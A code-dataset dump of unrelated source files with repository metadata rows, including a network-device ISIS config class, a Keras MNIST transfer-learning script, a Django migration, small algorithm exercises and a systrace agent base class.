with excutils.save_and_reraise_exception():
LOG.error(_LE('Post-operation success function failed '
'for operation %s'),
repr(oper))
@staticmethod
def _run_post_failure_function(oper):
try:
ctx = context.get_admin_context()
oper.manager.failed_completion(ctx, oper.data_model)
LOG.debug('Post-operation failure function completed '
'for operation %s',
repr(oper))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Post-operation failure function failed '
'for operation %s'),
repr(oper))
class OperationAttributes(object):
"""Holds operation attributes"""
def __init__(self,
manager,
operation_url,
lb,
data_model=None,
old_data_model=None,
delete=False,
post_operation_function=None):
self.manager = manager
self.operation_url = operation_url
self.lb = lb
self.data_model = data_model
self.old_data_model = old_data_model
self.delete = delete
self.post_operation_function = post_operation_function
self.creation_time = time.time()
def __repr__(self):
attrs = self.__dict__
items = ("%s = %r" % (k, v) for k, v in attrs.items())
return "<%s: {%s}>" % (self.__class__.__name__, ', '.join(items))
def _rest_wrapper(response, success_codes=None):
"""Wrap a REST call and make sure a valido status is returned."""
success_codes = success_codes or [202]
if not response:
raise r_exc.RESTRequestFailure(
status=-1,
reason="Unknown",
description="Unknown",
success_codes=success_codes
)
elif response[rest.RESP_STATUS] not in success_codes:
raise r_exc.RESTRequestFailure(
status=response[rest.RESP_STATUS],
reason=response[rest.RESP_REASON],
description=response[rest.RESP_STR],
success_codes=success_codes
)
else:
LOG.debug("this is a respone: %s" % (response,))
return response[rest.RESP_DATA]
| [
"tony.pig@gmail.com"
] | tony.pig@gmail.com |
2c3ea8b81536b7c933e4b3a416923e9b9f6d2579 | cbedb18df0aaac810aeea87a2273edb15c1cf899 | /Strings/49. Group Anagrams (python string builder).py | 8b0bb59ac43006a54f171ca77f88aec37cd1619d | [] | no_license | kanglicheng/CodeBreakersCode | 71b833bb9f4c96d520c26f0044365dc62137a940 | 31f7f730227a0e10951e7468bad1b995cf2eafcb | refs/heads/master | 2023-08-07T20:32:05.267695 | 2020-09-14T14:36:25 | 2020-09-14T14:36:25 | 265,978,034 | 0 | 0 | null | 2020-05-22T00:05:29 | 2020-05-22T00:05:29 | null | UTF-8 | Python | false | false | 1,035 | py | # not sure about the solution at start
# sort each str => O(W logW), w is the length of each words -> O(N * W log W) or counting sort O(N*W)
# turn each word into count char list: each list length is fixed:26 -> need O(W) to turn to list
# but lst can't hash -> turn to str then use hash map
class Solution:
def groupAnagrams(self, strs: List[str]) -> List[List[str]]:
_dict = {}
for w in strs:
arr = [0] * 26
for c in w:
index = ord(c) - ord('a')
arr[index] += 1
sortedStr = ""
for v in arr:
sortedStr += (str(v) + "|")
if sortedStr in _dict:
_dict[sortedStr].append(w)
else:
_dict[sortedStr] = [w]
res = []
for val in _dict.values():
res.append(val)
return res
| [
"56766457+Wei-LiHuang@users.noreply.github.com"
] | 56766457+Wei-LiHuang@users.noreply.github.com |
70573600e0f7e3bf2144f550ad7a28e7db17e2c2 | 5f5c052aa6a42e7492daf940c9561f5ce84ecb1c | /geatpy/demo/sentense_search/aimfuc.py | 68a6d1234a3b6ecaa5b0919fae9690a3c6b8f466 | [] | no_license | siuyincheung/geatpy | 8b343087c506cef39a7dc377a667ae9f1392acd4 | 48d41c8835004d9b0c36060881ed9cfb07483f1e | refs/heads/master | 2020-03-27T08:15:57.973576 | 2018-08-27T00:21:00 | 2018-08-27T00:21:00 | 146,237,904 | 1 | 0 | null | 2018-08-27T02:39:41 | 2018-08-27T02:39:41 | null | UTF-8 | Python | false | false | 327 | py | import numpy as np
def aimfuc(Phen):
real = np.array([ord('I'),ord(' '),ord('a'),ord('m'),ord(' '),ord('a'),
ord(' '),ord('l'),ord('i'),ord('t'),ord('t'),ord('l'),
ord('e'),ord(' '),ord('b'),ord('o'),ord('y')])
diff = np.sum((Phen - real)**2, 1)
return np.array([diff]).T
| [
"jazzbin@geatpy.com"
] | jazzbin@geatpy.com |
7a59a1045aed4872467a495c9c8559d6cf22d43b | 716ed8ab9cbd61837fb116635c2d378b32eeb890 | /app/migrations/0004_auto_20180902_0447.py | 2f5b3abdde6abf5825fdd6216228555e3f33be87 | [] | no_license | koneb71/waterworks-django | 19dab148fc46f85e1be55b8440f40f5cf2ea29c6 | 0de58e43ab04348622933f98d79c7d4c109fcb85 | refs/heads/master | 2020-03-28T07:18:50.512581 | 2018-10-15T03:53:05 | 2018-10-15T03:53:05 | 147,893,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-09-02 12:47
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0003_auto_20180902_0447'),
]
operations = [
migrations.AlterField(
model_name='client',
name='account_number',
field=models.CharField(default=b'2018024753', max_length=30),
),
migrations.AlterField(
model_name='client',
name='meter_serial_number',
field=models.CharField(default=b'814296570', max_length=30),
),
migrations.AlterField(
model_name='collection',
name='created_date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 9, 2, 4, 47, 53, 490427)),
),
migrations.AlterField(
model_name='collection',
name='due_date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 10, 2, 4, 47, 53, 490458)),
),
]
| [
"koneb2013@gmail.com"
] | koneb2013@gmail.com |
558c33eace9ec016d663c4af1776962e0dfe13ab | e42a61b7be7ec3412e5cea0ffe9f6e9f34d4bf8d | /a10sdk/core/interface/interface_ve_isis.py | c85a7fd5cba9aee355ac9680bca40c6207de6019 | [
"Apache-2.0"
] | permissive | amwelch/a10sdk-python | 4179565afdc76cdec3601c2715a79479b3225aef | 3e6d88c65bd1a2bf63917d14be58d782e06814e6 | refs/heads/master | 2021-01-20T23:17:07.270210 | 2015-08-13T17:53:23 | 2015-08-13T17:53:23 | 40,673,499 | 0 | 0 | null | 2015-08-13T17:51:35 | 2015-08-13T17:51:34 | null | UTF-8 | Python | false | false | 20,388 | py | from a10sdk.common.A10BaseClass import A10BaseClass
class PriorityList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param priority: {"description": "Set priority for Designated Router election (Priority value)", "format": "number", "default": 64, "maximum": 127, "minimum": 0, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify priority for level-1 routing; 'level-2': Specify priority for level-2 routing; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "priority-list"
self.DeviceProxy = ""
self.priority = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class HelloIntervalMinimalList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param hello_interval_minimal: {"default": 0, "type": "number", "description": "Set Hello holdtime 1 second, interval depends on multiplier", "format": "flag"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello-interval for level-1 IIHs; 'level-2': Specify hello-interval for level-2 IIHs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "hello-interval-minimal-list"
self.DeviceProxy = ""
self.hello_interval_minimal = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class MeshGroup(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"description": "Mesh group number", "format": "number", "maximum": 4294967295, "minimum": 1, "not": "blocked", "type": "number"}
:param blocked: {"default": 0, "not": "value", "type": "number", "description": "Block LSPs on this interface", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "mesh-group"
self.DeviceProxy = ""
self.value = ""
self.blocked = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class BfdCfg(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param disable: {"default": 0, "type": "number", "description": "Disable BFD", "format": "flag"}
:param bfd: {"default": 0, "type": "number", "description": "Bidirectional Forwarding Detection (BFD)", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "bfd-cfg"
self.DeviceProxy = ""
self.disable = ""
self.bfd = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class PasswordList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param password: {"minLength": 1, "maxLength": 254, "type": "string", "description": "Configure the authentication password for interface", "format": "string-rlx"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify password for level-1 PDUs; 'level-2': Specify password for level-2 PDUs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "password-list"
self.DeviceProxy = ""
self.password = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class KeyChainList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param key_chain: {"minLength": 1, "maxLength": 128, "type": "string", "description": "Authentication key-chain (Name of key-chain)", "format": "string"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication key-chain for level-1 PDUs; 'level-2': Specify authentication key-chain for level-2 PDUs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "key-chain-list"
self.DeviceProxy = ""
self.key_chain = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class ModeList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param mode: {"enum": ["md5"], "type": "string", "description": "'md5': Keyed message digest; ", "format": "enum"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication mode for level-1 PDUs; 'level-2': Specify authentication mode for level-2 PDUs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "mode-list"
self.DeviceProxy = ""
self.mode = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class SendOnlyList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param send_only: {"default": 0, "type": "number", "description": "Authentication send-only", "format": "flag"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication send-only for level-1 PDUs; 'level-2': Specify authentication send-only for level-2 PDUs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "send-only-list"
self.DeviceProxy = ""
self.send_only = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Authentication(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param key_chain_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"key-chain": {"minLength": 1, "maxLength": 128, "type": "string", "description": "Authentication key-chain (Name of key-chain)", "format": "string"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication key-chain for level-1 PDUs; 'level-2': Specify authentication key-chain for level-2 PDUs; ", "format": "enum"}}}]}
:param mode_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "mode": {"enum": ["md5"], "type": "string", "description": "'md5': Keyed message digest; ", "format": "enum"}, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication mode for level-1 PDUs; 'level-2': Specify authentication mode for level-2 PDUs; ", "format": "enum"}}}]}
:param send_only_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"send-only": {"default": 0, "type": "number", "description": "Authentication send-only", "format": "flag"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify authentication send-only for level-1 PDUs; 'level-2': Specify authentication send-only for level-2 PDUs; ", "format": "enum"}}}]}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "authentication"
self.DeviceProxy = ""
self.key_chain_list = []
self.mode_list = []
self.send_only_list = []
for keys, value in kwargs.items():
setattr(self,keys, value)
class WideMetricList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param wide_metric: {"description": "Configure the wide metric for interface", "format": "number", "default": 10, "maximum": 16777214, "minimum": 1, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Apply metric to level-1 links; 'level-2': Apply metric to level-2 links; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "wide-metric-list"
self.DeviceProxy = ""
self.wide_metric = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class HelloIntervalList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param hello_interval: {"description": "Set Hello interval in seconds (Hello interval value)", "format": "number", "default": 10, "maximum": 65535, "minimum": 1, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello-interval for level-1 IIHs; 'level-2': Specify hello-interval for level-2 IIHs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "hello-interval-list"
self.DeviceProxy = ""
self.hello_interval = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class HelloMultiplierList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param hello_multiplier: {"description": "Set multiplier for Hello holding time (Hello multiplier value)", "format": "number", "default": 3, "maximum": 100, "minimum": 2, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello multiplier for level-1 IIHs; 'level-2': Specify hello multiplier for level-2 IIHs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "hello-multiplier-list"
self.DeviceProxy = ""
self.hello_multiplier = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class MetricList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param metric: {"description": "Configure the metric for interface (Default metric)", "format": "number", "default": 10, "maximum": 63, "minimum": 1, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Apply metric to level-1 links; 'level-2': Apply metric to level-2 links; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "metric-list"
self.DeviceProxy = ""
self.metric = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class CsnpIntervalList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Speficy interval for level-1 CSNPs; 'level-2': Specify interval for level-2 CSNPs; ", "format": "enum"}
:param csnp_interval: {"description": "Set CSNP interval in seconds (CSNP interval value)", "format": "number", "default": 10, "maximum": 65535, "minimum": 1, "type": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "csnp-interval-list"
self.DeviceProxy = ""
self.level = ""
self.csnp_interval = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Isis(A10BaseClass):
"""Class Description::
ISIS.
Class isis supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param priority_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"priority": {"description": "Set priority for Designated Router election (Priority value)", "format": "number", "default": 64, "maximum": 127, "minimum": 0, "type": "number"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify priority for level-1 routing; 'level-2': Specify priority for level-2 routing; ", "format": "enum"}}}]}
:param retransmit_interval: {"description": "Set per-LSP retransmission interval (Interval between retransmissions of the same LSP (seconds))", "format": "number", "default": 5, "optional": true, "maximum": 65535, "minimum": 0, "type": "number"}
:param hello_interval_minimal_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"hello-interval-minimal": {"default": 0, "type": "number", "description": "Set Hello holdtime 1 second, interval depends on multiplier", "format": "flag"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello-interval for level-1 IIHs; 'level-2': Specify hello-interval for level-2 IIHs; ", "format": "enum"}}}]}
:param network: {"optional": true, "enum": ["broadcast", "point-to-point"], "type": "string", "description": "'broadcast': Specify IS-IS broadcast multi-access network; 'point-to-point': Specify IS-IS point-to-point network; ", "format": "enum"}
:param lsp_interval: {"description": "Set LSP transmission interval (LSP transmission interval (milliseconds))", "format": "number", "default": 33, "optional": true, "maximum": 4294967295, "minimum": 1, "type": "number"}
:param padding: {"default": 1, "optional": true, "type": "number", "description": "Add padding to IS-IS hello packets", "format": "flag"}
:param password_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"password": {"minLength": 1, "maxLength": 254, "type": "string", "description": "Configure the authentication password for interface", "format": "string-rlx"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify password for level-1 PDUs; 'level-2': Specify password for level-2 PDUs; ", "format": "enum"}}}]}
:param wide_metric_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "wide-metric": {"description": "Configure the wide metric for interface", "format": "number", "default": 10, "maximum": 16777214, "minimum": 1, "type": "number"}, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Apply metric to level-1 links; 'level-2': Apply metric to level-2 links; ", "format": "enum"}}}]}
:param hello_interval_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "hello-interval": {"description": "Set Hello interval in seconds (Hello interval value)", "format": "number", "default": 10, "maximum": 65535, "minimum": 1, "type": "number"}, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello-interval for level-1 IIHs; 'level-2': Specify hello-interval for level-2 IIHs; ", "format": "enum"}}}]}
:param circuit_type: {"description": "'level-1': Level-1 only adjacencies are formed; 'level-1-2': Level-1-2 adjacencies are formed; 'level-2-only': Level-2 only adjacencies are formed; ", "format": "enum", "default": "level-1-2", "type": "string", "enum": ["level-1", "level-1-2", "level-2-only"], "optional": true}
:param hello_multiplier_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "hello-multiplier": {"description": "Set multiplier for Hello holding time (Hello multiplier value)", "format": "number", "default": 3, "maximum": 100, "minimum": 2, "type": "number"}, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello multiplier for level-1 IIHs; 'level-2': Specify hello multiplier for level-2 IIHs; ", "format": "enum"}}}]}
:param metric_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"metric": {"description": "Configure the metric for interface (Default metric)", "format": "number", "default": 10, "maximum": 63, "minimum": 1, "type": "number"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Apply metric to level-1 links; 'level-2': Apply metric to level-2 links; ", "format": "enum"}}}]}
:param csnp_interval_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Speficy interval for level-1 CSNPs; 'level-2': Specify interval for level-2 CSNPs; ", "format": "enum"}, "optional": true, "csnp-interval": {"description": "Set CSNP interval in seconds (CSNP interval value)", "format": "number", "default": 10, "maximum": 65535, "minimum": 1, "type": "number"}}}]}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/interface/ve/{ifnum}/isis`.
"""
    def __init__(self, **kwargs):
        """Initialize an AXAPI ``isis`` configuration object for a VE
        interface: every field starts with an empty/default value, then any
        keyword arguments are applied verbatim as attribute overrides.

        :param kwargs: field overrides; each key is set as an attribute on
            the instance (e.g. ``circuit_type='level-1'``).
        """
        self.ERROR_MSG = ""
        self.required=[]
        # AXAPI binding: payload key and resource URL template
        # ({ifnum} is substituted by the caller / device proxy layer).
        self.b_key = "isis"
        self.a10_url="/axapi/v3/interface/ve/{ifnum}/isis"
        self.DeviceProxy = ""
        # Per-field defaults: lists for *-list fields, dicts for sub-objects,
        # empty strings for scalars.
        self.priority_list = []
        self.retransmit_interval = ""
        self.hello_interval_minimal_list = []
        self.mesh_group = {}
        self.network = ""
        self.bfd_cfg = {}
        self.lsp_interval = ""
        self.padding = ""
        self.password_list = []
        self.authentication = {}
        self.wide_metric_list = []
        self.hello_interval_list = []
        self.circuit_type = ""
        self.hello_multiplier_list = []
        self.metric_list = []
        self.csnp_interval_list = []
        self.uuid = ""
        # Caller-supplied keyword arguments override the defaults above.
        for keys, value in kwargs.items():
            setattr(self,keys, value)
| [
"doug@parksidesoftware.com"
] | doug@parksidesoftware.com |
9c01e7f694d285cbc82aed43b85433d7426fc179 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/224/users/4363/codes/1596_2049.py | 2393618f22d551063f10e697c5ea26d03c3da23b | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # Teste seu codigo aos poucos.
# Nao teste tudo no final, pois fica mais dificil de identificar erros.
# Nao se intimide com as mensagens de erro. Elas ajudam a corrigir seu codigo.
x = int(input("dividendo "))
y = int(input("divisor "))
print(x)
print(y)
print(x//y)
print(x%y) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
55c84f580c92d7a7645d5c9af2c759b950a7f84a | ac64fda7f1bfc92f7897efd60b8f3f0aeb22b4d7 | /syntactic_mutations/mnist_tr/mutants/mutant118.py | c11c9efb905c74722b9130a38af9dbfcb856ee71 | [] | no_license | dlfaults/mutation_operators_evaluation | ea7f33459ba7bcf7d70092d9db8b40f9b338d516 | 7d1ff30e901931a46bf8908e9bb05cae3daa5f0f | refs/heads/master | 2020-12-27T15:45:07.262012 | 2020-02-03T12:22:01 | 2020-02-03T12:22:01 | 237,955,342 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,611 | py | import datetime
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
now = datetime.datetime.now

# Training hyper-parameters.
batch_size = 128
num_classes = 5   # the 10 digits are split into two 5-class tasks (0-4, 5-9)
epochs = 5

# Input image dimensions (MNIST 28x28 grayscale).
(img_rows, img_cols) = (28, 28)
# Convolution settings: number of filters, pooling window, kernel size.
filters = 32
pool_size = 2
kernel_size = 3
input_shape = (img_rows, img_cols, 1)
def train(model, train, test, num_classes, model_name):
    """Compile, fit, save and evaluate *model* on one data split.

    :param model: Keras model; compiled and fitted in place.
    :param train: tuple (images, integer_labels) used for training.
    :param test: tuple (images, integer_labels) used for validation.
    :param num_classes: number of classes for one-hot label encoding.
    :param model_name: file path the fitted model is saved to.
    :return: tuple (test_loss, test_accuracy) from ``model.evaluate``.
    """
    # Reshape to (N, rows, cols, channels) and scale pixel values to [0, 1].
    x_train = train[0].reshape((train[0].shape[0],) + input_shape)
    x_test = test[0].reshape((test[0].shape[0],) + input_shape)
    x_train = x_train.astype('float32')
    x_test = x_test.astype('float32')
    x_train /= 255
    x_test /= 255
    # One-hot encode the integer class labels.
    y_train = keras.utils.to_categorical(train[1], num_classes)
    y_test = keras.utils.to_categorical(test[1], num_classes)
    model.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=['accuracy'])
    model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test))
    model.save(model_name)
    score = model.evaluate(x_test, y_test, verbose=0)
    return (score[0], score[1])
def train_model(x_train, y_train, x_test, y_test, model1_name, model2_name):
    """Transfer-learning experiment: train convolutional features on digits
    0-4, freeze them, then fine-tune the classifier head on digits 5-9.

    :param model1_name: save path for the model fitted on digits < 5.
    :param model2_name: save path for the model fitted on digits >= 5.

    NOTE(review): this function ends with ``pass`` and discards both
    (loss, acc) result pairs. The file path indicates a mutation-testing
    "mutants" tree, so the missing return is presumably the seeded fault —
    confirm before reusing this code elsewhere.
    """
    # Split both sets: digits below 5, and digits 5-9 remapped to 0-4.
    x_train_lt5 = x_train[y_train < 5]
    y_train_lt5 = y_train[y_train < 5]
    x_test_lt5 = x_test[y_test < 5]
    y_test_lt5 = y_test[y_test < 5]
    x_train_gte5 = x_train[y_train >= 5]
    y_train_gte5 = y_train[y_train >= 5] - 5
    x_test_gte5 = x_test[y_test >= 5]
    y_test_gte5 = y_test[y_test >= 5] - 5
    # Convolutional feature extractor.
    feature_layers = [
        Conv2D(filters, kernel_size, padding='valid', input_shape=input_shape),
        Activation('relu'),
        Conv2D(filters, kernel_size),
        Activation('relu'),
        MaxPooling2D(pool_size=pool_size),
        Dropout(0.25),
        Flatten()]
    # Dense classification head.
    classification_layers = [
        Dense(128),
        Activation('relu'),
        Dropout(0.5),
        Dense(num_classes),
        Activation('softmax')]
    model = Sequential(feature_layers + classification_layers)
    # Phase 1: train the full model on digits 0-4.
    (loss1, acc1) = train(model,
                          (x_train_lt5, y_train_lt5),
                          (x_test_lt5, y_test_lt5), num_classes, model1_name)
    # Phase 2: freeze the feature layers, fine-tune the head on digits 5-9.
    for l in feature_layers:
        l.trainable = False
    (loss2, acc2) = train(model,
                          (x_train_gte5, y_train_gte5),
                          (x_test_gte5, y_test_gte5), num_classes, model2_name)
    pass
"gunel71@gmail.com"
] | gunel71@gmail.com |
870f58223b2bf1ea451ad5f430647e0c076b21c0 | 38c10c01007624cd2056884f25e0d6ab85442194 | /third_party/catapult/systrace/systrace/systrace_agent.py | 376d4f2507b0a8d04b8fa336d1c78567ee61812b | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0"
] | permissive | zenoalbisser/chromium | 6ecf37b6c030c84f1b26282bc4ef95769c62a9b2 | e71f21b9b4b9b839f5093301974a45545dad2691 | refs/heads/master | 2022-12-25T14:23:18.568575 | 2016-07-14T21:49:52 | 2016-07-23T08:02:51 | 63,980,627 | 0 | 2 | BSD-3-Clause | 2022-12-12T12:43:41 | 2016-07-22T20:14:04 | null | UTF-8 | Python | false | false | 1,647 | py | # Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class SystraceAgent(object):
  """Abstract base class for systrace agents.

  An agent bundles the command-line options and the trace categories it
  should capture; each concrete subclass supplies the actual tracing
  implementation.
  """

  def __init__(self, options, categories):
    """Store the command-line options and trace categories.

    Args:
      options: The command-line options.
      categories: The trace categories to capture.
    """
    self._options = options
    self._categories = categories

  def start(self):
    """Begin tracing (subclass responsibility)."""
    raise NotImplementedError()

  def collect_result(self):
    """Block until the trace result has been collected.

    Sync-mode agents read the data (e.g. from stdout) until it is complete;
    async-mode agents block until the agent is stopped and the data is ready.
    """
    raise NotImplementedError()

  def expect_trace(self):
    """Report whether the agent will return a trace.

    The answer is determined during collect_result().

    Returns:
      Whether the agent is expecting a trace or not.
    """
    raise NotImplementedError()

  def get_trace_data(self):
    """Return the collected trace data."""
    raise NotImplementedError()

  def get_class_name(self):
    """Return the class name used to tag this trace type in the html file."""
    raise NotImplementedError()
| [
"zeno.albisser@hemispherian.com"
] | zeno.albisser@hemispherian.com |
49b046dd8aff3875402eaf5275f060f0b3b0174f | 1e6681ca2569c3de32db2d3b1c957652f8d8ccb3 | /xiaoqu_to_chart.py | f9b5ad6726ff6fff1cac6d9a26eed030e88e9e19 | [] | no_license | re0phimes/lianjia-beike-spider | d48e5bb05af9c8557ff32f9ca54746c4649d6281 | cb4ff13b6145c5169263e486e03d9fbca52450fe | refs/heads/master | 2020-04-02T17:21:11.770535 | 2018-10-24T23:42:44 | 2018-10-24T23:42:44 | 154,654,321 | 1 | 0 | null | 2018-10-25T10:45:10 | 2018-10-25T10:45:10 | null | UTF-8 | Python | false | false | 2,380 | py | #!/usr/bin/env python
# coding=utf-8
# author: zengyuetian
import webbrowser
import pandas as pd
import numpy as np
from pyecharts import Bar
import webbrowser as web
import os
import time
from lib.utility.version import PYTHON_3
if __name__ == '__main__':
    # Restart a local static-file HTTP server on port 8080 so the generated
    # chart pages can be served (http.server on Python 3, SimpleHTTPServer on
    # Python 2); any previously started instance is killed first.
    try:
        if PYTHON_3:
            os.system("ps aux | grep python | grep http.server | grep -v grep | awk '{print $2}' | xargs kill")
